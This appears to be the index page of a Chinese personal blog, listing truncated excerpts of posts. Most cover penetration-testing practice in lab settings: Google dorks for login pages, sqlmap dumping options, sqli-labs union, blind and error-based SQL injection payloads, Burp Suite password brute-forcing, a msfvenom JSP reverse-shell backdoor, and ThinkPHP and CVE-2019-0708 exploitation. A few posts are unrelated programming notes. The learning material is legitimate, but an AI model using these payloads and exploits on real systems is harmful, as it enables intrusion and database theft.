原创 Google Hack語法總結

Google、Yahoo、Baidu、Bing都可以使用該語法 site:target.com intext:管理 | 後臺 | 後臺管理 | 登陸 | 登錄 | 用戶名 | 密碼 | 系統 | 賬號 | login | syst

原创 sqlmap進階用法

sqlmap進階用法 -D <指定數據庫> -T <指定表名> -C <指定段名> --dump 獲取全部數據 -p 指定參數,或者在需要注入的參數後加*號, 例1: sqlmap -u <url> -p <parameter>

原创 sqli-labs-master(Lesson-9時間注入)

一、時間注入 時間注入,顧名思義,通過時間方法來拆解數據庫信息(廢話);時間注入主要用 if(表達式1,表達式2,表達式3) 函數與sleep() 函數配合使用。if函數原理是當表達式1爲True時,返回值爲表達式二,否則返回表

原创 sqli-labs-master(報錯注入)

報錯注入 報錯注入主要運用三個函數爲:updatexml(),extractvalue(),floor().前二者皆是通過構造錯誤的xml格式獲取到數據庫內容,floor()函數是配合rand()函數構成數據庫查詢主鍵重複錯誤來獲

原创 sqli-labs-master(Lesson-1)附上腳本

字符型與數字型所使用的payload有所不同,但是大同小異,注意總結 一、獲取字段數和可插入位置: id=1' order by 3--+ id=-1' union select 1,2,3 --+ 二、獲取當前數據庫、當前

原创 sqli-labs-master(Lesson-2)

數字型相對字符型比較容易,上來直接開幹 一、獲取字段數: # order by 4頁面報錯,3頁面正常 ?id=1 order by 3 二、查詢可以插入的位置: # 回顯爲2,3可以在2或3的位置插入數據庫查詢語句 id=-

原创 利用BurpSuite爆破登陸密碼

在kali設置好瀏覽器的代理,如圖: 瀏覽器配置好配置Burp Suite代理,點擊Proxy界面的Options進行設置,別忘了勾選: 在瀏覽器打開需要爆破密碼的登陸頁面,然後打開Burpsuite點擊Intercept界

原创 Metasploit生成後門木馬

一、環境: 攻擊機(kali):192.168.10.128 受害主機(win7):192.168.10.129 生成後門jsp: root@kali:~# msfvenom -p java/jsp_shell_reverse_t

原创 Java與Python構造函數(簡單易懂)

Java構造函數相對Python就比較複雜一點,採用的是重載構造方法,下面舉例。 首先講Java的,舉一個簡單的例子: public class sayHello { //類屬性,非靜態 String words;

原创 ThinkPHP5.0.x 遠程代碼執行漏洞復現

一、簡介 ThinkPHP是一款運用極廣的PHP開發框架。其版本5中,由於沒有正確處理控制器名,導致在網站沒有開啓強制路由的情況下(即默認情況下)可以執行任意方法,從而導致遠程命令執行漏洞。 參考鏈接: http://www.t

原创 Cisco NAT配置實驗

一、NAT簡介: NAT(Network Address Translation,網絡地址轉換),NAT不僅能解決IP地址不足的問題,而且還能夠有效地避免來自網絡外部的攻擊,隱藏並保護網絡內部的計算機。 優點: 寬帶分享:這是

原创 CVE-2019-0708復現拿shell

把CVE-2019-0708的攻擊套件添加到metasploit中 添加教程 攻擊主機:192.168.10.128 目標主機:192.168.10.131 (win7 SP1) 打開msf,輸入reload_a

原创 DVWA之盲注

Blind注入(盲注) 盲注只會顯示True和False(廢話),所以我們利用substr(),length(),ord()函數逐步拆解數據庫名、表名、字段名和字段數據。熟練運用後可以編寫攻擊腳本,使用二分法拆解速度更快。 一、判

原创 Go冒泡排序

按照本菜鳥的習慣,入門新的語言首先寫一個冒泡排序當練練手:) 代碼: func bubbleSort(arr []int) { count := 0 for i := 0; i < len(arr); i++ { for